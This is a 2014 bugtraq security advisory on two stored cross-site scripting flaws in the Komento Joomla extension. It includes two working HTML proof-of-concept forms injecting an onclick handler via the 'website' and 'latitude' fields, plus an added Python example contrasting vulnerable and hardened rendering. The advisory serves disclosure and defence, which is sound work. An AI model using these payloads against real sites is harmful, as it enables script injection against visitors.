
List:       bugtraq
Subject:    Cross-Site Scripting (XSS) in Komento Joomla Extension
From:       High-Tech Bridge Security Research <advisory () htbridge ! com>
Date:       2014-01-23 12:13:35
Message-ID: 20140123121335.79E502C5864E () htbridge ! ch

Advisory ID: HTB23194
Product: Komento Joomla Extension
Vendor: Stack Ideas Sdn Bhd.
Vulnerable Version(s): 1.7.2 and probably prior
Tested Version: 1.7.2
Advisory Publication:  January 2, 2014  [without technical details]
Vendor Notification: January 2, 2014 
Vendor Patch: January 2, 2014 
Public Disclosure: January 23, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-0793
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered two stored Cross-Site Scripting (XSS) vulnerabilities in Komento Joomla Extension, which can be exploited to perform script insertion attacks. Both issues share the same root cause (user-supplied comment fields emitted into HTML attributes without encoding) and are tracked under one CVE identifier.


1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "website" HTTP POST parameter to the "/?option=com_komento" URL. A remote attacker can submit a comment with a specially crafted "Website" field and execute arbitrary HTML and script code in a user's browser in the context of the vulnerable website when the user clicks on the nickname of the malicious author. The payload is stored with the comment, so it fires for every visitor who clicks the nickname: in the PoC below the double quote in the "website" value closes the HTML attribute the value is emitted into, and the remainder adds an "onclick" handler to the link.

The following exploitation example uses the "alert()" JavaScript function to display the word "immuniweb" when a user clicks on the attacker's nickname in the comment. The "cid" and "pageItemId" values identify the article and menu item on the tested instance, and the hidden field named with a 32-character hex string has the shape of a Joomla session form token, which is issued per session; all three must be adjusted to the target before the form is submitted:

<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax">
<input type="hidden" name="no_html" value="1">
<input type="hidden" name="component" value="com_content">
<input type="hidden" name="cid" value="24">
<input type="hidden" name="comment" value="comment">
<input type="hidden" name="parent_id" value="0">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="email@email.com">
<input type="hidden" name="website" value='http://www.htbridge.com"  onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe" value="false">
<input type="hidden" name="latitude" value=''>
<input type="hidden" name="longitude" value="1">
<input type="hidden" name="address" value="1">
<input type="hidden" name="contentLink" value="http://joomla/">
<input type="hidden" name="pageItemId" value="435">
<input type="hidden" name="option" value="com_komento">
<input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1">
<input type="submit" id="btn">
</form>


1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "latitude" HTTP POST parameter to the "/?option=com_komento" URL. A remote attacker can submit a comment with a specially crafted "latitude" field and execute arbitrary HTML and script code in a user's browser in the context of the vulnerable website when the user clicks on the address of the malicious author. As with the "website" field, the value is stored with the comment and emitted into an HTML attribute unencoded, so a leading double quote closes that attribute and the rest of the value injects an "onclick" handler.

The following exploitation example uses the "alert()" JavaScript function to display the word "immuniweb" when a user clicks on the attacker's address in the comment (the instance-specific fields are the same as in the first PoC):

<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl" value="component">
<input type="hidden" name="format" value="ajax">
<input type="hidden" name="no_html" value="1">
<input type="hidden" name="component" value="com_content">
<input type="hidden" name="cid" value="24">
<input type="hidden" name="comment" value="comment">
<input type="hidden" name="parent_id" value="0">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="email@email.com">
<input type="hidden" name="website" value='www.htbridge.com'>
<input type="hidden" name="subscribe" value="false">
<input type="hidden" name="latitude" value='"  onclick="javascript:alert(/immuniweb/);">'>
<input type="hidden" name="longitude" value="1">
<input type="hidden" name="address" value="1">
<input type="hidden" name="contentLink" value="http://joomla/">
<input type="hidden" name="pageItemId" value="435">
<input type="hidden" name="option" value="com_komento">
<input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1">
<input type="submit" id="btn">
</form>
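
Both PoCs above exploit the same defect: a comment field is written into a quoted HTML attribute without attribute encoding, so a `"` in the data closes the attribute and the attacker appends an `onclick` handler. The following is an added illustration, not Komento's or Stack Ideas' code: the two render functions are hypothetical templates that stand in for the vulnerable and the hardened output of the author link, the "maps.example" URL and the field names are assumptions, and the payloads are constructed from the two forms in this advisory. The hardened version goes one step beyond what the advisory describes by also rejecting non-http(s) schemes in the "website" field. The `event_handlers` check parses the rendered markup the way a browser would instead of string-searching, so an encoded `&quot;onclick=` is correctly not counted as an attribute.

```python
"""Attribute-context XSS (CWE-79) as in HTB23194: vulnerable render beside a
hardened one, plus a parser-based check for injected on* attributes.
Added example; templates and names here are hypothetical, not Komento's code."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed payloads, modelled on the "website" and "latitude" values
# submitted by the two PoC forms in the advisory.
WEBSITE_PAYLOAD = 'http://www.htbridge.com"  onclick="javascript:alert(/immuniweb/);"'
LATITUDE_PAYLOAD = '"  onclick="javascript:alert(/immuniweb/);">'

# Plain hostname (optionally with port); anything else in the authority is refused.
_HOST_RE = re.compile(r"[A-Za-z0-9.-]+(:\d{1,5})?")


def render_author_vulnerable(name, website, latitude, longitude):
    """Hypothetical template that interpolates POST fields straight into
    attributes. Attacker-controlled text lands right after href=" and ?q=,
    which is the pattern the advisory describes."""
    return (f'<a href="{website}">{name}</a> '
            f'<a href="https://maps.example/?q={latitude},{longitude}">address</a>')


def safe_url(value):
    """Return the URL if it is an absolute http(s) URL with a plain hostname,
    else None. The scheme check also refuses javascript: links (an assumption
    about what a website field should accept, not something the advisory covers)."""
    value = value.strip()
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not _HOST_RE.fullmatch(parts.netloc):
        return None
    return value


def parse_coordinate(value, lo, hi):
    """Coordinates are numbers: parse as float and range-check, else None.
    NaN and inf fail the range comparison and are rejected as well."""
    try:
        number = float(value)
    except (TypeError, ValueError):
        return None
    return number if lo <= number <= hi else None


def render_author_hardened(name, website, latitude, longitude):
    """Validate each field for its type first, then attribute-encode anything
    placed inside a quoted attribute: html.escape(quote=True) turns " into
    &quot;, so the attribute cannot be closed early by the data."""
    out = []
    url = safe_url(website)
    if url is None:
        out.append(f"<span>{html.escape(name)}</span>")
    else:
        out.append(f'<a href="{html.escape(url, quote=True)}">{html.escape(name)}</a>')
    lat = parse_coordinate(latitude, -90.0, 90.0)
    lon = parse_coordinate(longitude, -180.0, 180.0)
    if lat is not None and lon is not None:
        out.append(f'<a href="https://maps.example/?q={lat},{lon}">address</a>')
    return " ".join(out)


class _AttrCollector(HTMLParser):
    """Collects (tag, attribute name, attribute value) for every start tag."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend((tag, k, v) for k, v in attrs)


def event_handlers(markup):
    """Parse the rendered markup and return the on* attributes it really
    contains, i.e. what a browser would wire up as event handlers."""
    collector = _AttrCollector()
    collector.feed(markup)
    return [(tag, k) for tag, k, _ in collector.attrs if k.lower().startswith("on")]


if __name__ == "__main__":
    args = ("name", WEBSITE_PAYLOAD, LATITUDE_PAYLOAD, "1")
    print(event_handlers(render_author_vulnerable(*args)))  # onclick on both links
    print(event_handlers(render_author_hardened(*args)))    # []
```

Validation alone is not the fix: a value such as `http://example.com/?q="onclick="alert(1)` passes the scheme and host checks, and only the attribute encoding keeps it inside the `href`. Conversely, encoding alone would still let a `javascript:` URL through as a clickable link, which is why the hardened renderer does both.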


-----------------------------------------------------------------------------------------------


Solution:

Update to Komento 1.7.3

More Information:
http://stackideas.com/downloads/changelog/komento

-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - Cross-Site Scripting (XSS) in Komento Joomla Extension.
[2] Komento Joomla Extension - http://stackideas.com/ - Komento is a Joomla comment extension for articles and blogs in K2, EasyBlog, ZOO, Flexicontent, VirtueMart and redShop.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


